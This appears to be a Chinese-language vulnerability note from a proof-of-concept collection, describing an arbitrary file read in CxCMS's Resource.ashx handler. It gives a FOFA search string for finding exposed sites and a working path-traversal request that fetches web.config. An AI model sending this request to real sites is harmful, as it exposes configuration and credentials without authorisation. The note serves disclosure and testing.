Awesome-POC/CMS漏洞/CxCMS Resource.ashx 任意文件读取漏洞.md

31 lines
616 B
Markdown
Raw Normal View History

2022-05-18 16:23:08 +08:00
# CxCMS Resource.ashx 任意文件读取漏洞
## 漏洞描述
CxCMS 存在任意文件读取,由于 /Sys/Handler/Resource.ashx 页面 _FilePath 参数过滤不严,导致可以读取系统敏感文件。
## 漏洞影响
```
CxCMS
```
## FOFA
```
"Powered by CxCms"
```
## 漏洞复现
关键字"Powered by CxCms"
![image-20220518144245685](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181442728.png)
验证POC
```
/Sys/Handler/Resource.ashx?_FilePath=../../web.config
```
![image-20220518144331101](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205181443193.png)